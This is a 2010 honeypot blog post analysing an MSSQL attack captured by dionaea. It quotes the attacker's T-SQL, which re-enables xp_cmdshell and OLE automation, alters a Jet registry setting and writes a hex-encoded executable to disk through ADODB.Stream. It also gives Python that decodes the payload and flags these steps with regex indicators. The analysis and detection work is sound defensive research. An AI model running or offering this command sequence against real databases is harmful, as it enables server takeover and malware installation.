Attacks on MSSQL

Even though I'm not the only one reporting attacks on MSSQL, I've had no shiny attacks addressing the brand new mssql code for dionaea yet, I think due to protocol bugs. But I've had some nfq-gathered bistreams which could be replayed to the mssql service.

The bistream replayed was collected on 2010-08-09 and was contributed by 182.236.160.29 to my port 1433/tcp. I chose this bistream for its size, 245625 bytes, the largest bistream I captured for mssql.

After resolving some issues, I was able to dump the commands sent to the database into a text file.

So, what happens?

While I like databases, I'm not an expert for MSSQL, comments are open, feel free to enlighten me on this procedure.

My guess is, it creates exports from a bunch of standard dlls to assist in writing the file.

exec sp_server_info 18use master
 
CREATE procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */ @dllname varchar(255)/* name of DLL containing function */ AS
SET implicit_transactions off
IF @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
RETURN (1)
end
dbcc addextendedproc( @functname, @dllname)
RETURN (0) -- sp_addextendedproc
 
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll' 
exec sp_addextendedproc xp_dirtree,'xpstar.dll' 
exec sp_addextendedproc xp_enumgroups,'xplog70.dll' 
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' 
exec sp_addextendedproc xp_loginconfig,'xplog70.dll' 
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' 
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll' 
exec sp_addextendedproc sp_OACreate,'odsole70.dll' 
exec sp_addextendedproc sp_OADestroy,'odsole70.dll' 
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' 
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' 
exec sp_addextendedproc sp_OAMethod,'odsole70.dll' 
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll' 
exec sp_addextendedproc sp_OAStop,'odsole70.dll' 
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' 
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' 
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll' 
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll' 
exec sp_addextendedproc xp_regread,'xpstar.dll' 
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' 
exec sp_addextendedproc xp_regwrite,'xpstar.dll' 
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_dropextendedproc "xp_cmdshell"
exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
 
 
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
EXEC sp_OASetProperty @ObjectToken
 
exec sp_dropextendedproc "xp_cmdshell"
exec sp_addextendedproc 'xp_cmdshell','xpsql70.dll'
 
exec sp_dropextendedproc 'xp_cmdshell'
exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
 
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
 
 
dbcc addextendedproc("xp_cmdshell","xpweb70.dll")
dbcc addextendedproc("xp_cmdshell", "xpsql70.dll")
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
exec master..xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
DECLARE @ObjectToken INT
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
EXEC sp_OASetProperty @ObjectToken, 'Type', 1
EXEC sp_OAMethod @ObjectToken, 'Open'
EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x4D5A5...1001103310011033100110

So I guessed this would open a file with an unknown filename and write something to it; my guess was the file's content would be hex encoded.

Extracting this hex-encoded string and decoding it with:

# read the hex string extracted from the 'Write' call and decode it into the dropped binary
f = open('/tmp/mssql_file','rb')
h = f.readline()
f.close()
h = h.rstrip(b'\r\n') # remove the trailing \r\n
if h.startswith(b'0x'): # drop the 0x prefix in case it was kept when extracting
    h = h[2:]
b = bytes.fromhex(h.decode())
t = open('/tmp/mssql_file._bin','wb+')
t.write(b)
# 98677 (bytes written)
t.close()

The resulting file is 98677 bytes, has the md5 hash f0d60ea0dd56c06c96c80d2409ee6348, and gets very poor detection according to virustotal; most likely it is incomplete or broken.
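As an added example, not code from this post or from dionaea, here is a small Python script that scans such a command dump for the indicators seen in the captured sequence above (extended procedure registration of xp_cmdshell, the Jet SandBoxMode registry write, ADODB.Stream creation) and decodes the hex passed to the stream's 'Write' method, checking it for the MZ header that 0x4D5A announces. The dump is assumed to be one command per line; the sample lines are constructed and the hex in them is a made-up stub.

```python
import hashlib
import re

# Indicators drawn from the captured command sequence above (case-insensitive).
INDICATORS = {
    "xp_cmdshell registered via sp_addextendedproc": re.compile(r"sp_addextendedproc\s+['\"]?xp_cmdshell", re.I),
    "xp_cmdshell registered via dbcc addextendedproc": re.compile(r"dbcc\s+addextendedproc\s*\(\s*['\"]xp_cmdshell", re.I),
    "Jet SandBoxMode changed through xp_regwrite": re.compile(r"xp_regwrite.*SandBoxMode", re.I),
    "OLE automation object ADODB.Stream created": re.compile(r"sp_OACreate\s+'ADODB\.Stream'", re.I),
}
# The hex blob passed to the stream's Write method is the file being dropped.
WRITE_HEX = re.compile(r"sp_OAMethod\s+@\w+\s*,\s*'Write'\s*,\s*NULL\s*,\s*0x([0-9A-Fa-f]+)", re.I)

def analyze_dump(text):
    """Return indicator hits as (line number, name) and info on the decoded payload, if any."""
    hits, payload = [], None
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in INDICATORS.items():
            if rx.search(line):
                hits.append((lineno, name))
        m = WRITE_HEX.search(line)
        if m:
            h = m.group(1)
            if len(h) % 2:  # an odd digit count means the capture was cut off mid-byte
                h = h[:-1]
            payload = bytes.fromhex(h)
    info = None
    if payload is not None:
        info = {
            "size": len(payload),
            "md5": hashlib.md5(payload).hexdigest(),
            "is_pe": payload[:2] == b"MZ",  # 4D5A: DOS/PE executable header
        }
    return hits, info

# Constructed sample modelled on the dump above; the hex is a made-up 16-byte MZ stub.
SAMPLE = r"""exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
dbcc addextendedproc("xp_cmdshell","xpweb70.dll")
exec master..xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
DECLARE @ObjectToken INT
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
EXEC sp_OAMethod @ObjectToken, 'Open'
EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x4D5A90000300000004000000FFFF0000
"""

if __name__ == "__main__":
    hits, info = analyze_dump(SAMPLE)
    for lineno, name in hits:
        print(f"line {lineno}: {name}")
    print(info)
```

Run against a real dump, the md5 and size let you compare the recovered file with the one decoded by hand above, and a missing MZ header or an odd digit count points at a truncated capture.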

While I think the current version of the mssql code won't be able to fool an attacker who is using the mssql client api to connect long enough to get such results, it is at least a really promising start.

Comments

1

[…] 2010:08:27:attacks_on_mssql [carnivore news] […]

2010/08/28 20:52


2010/08/27/attacks_on_mssql.txt · Last modified: 2010/08/27 15:14 by common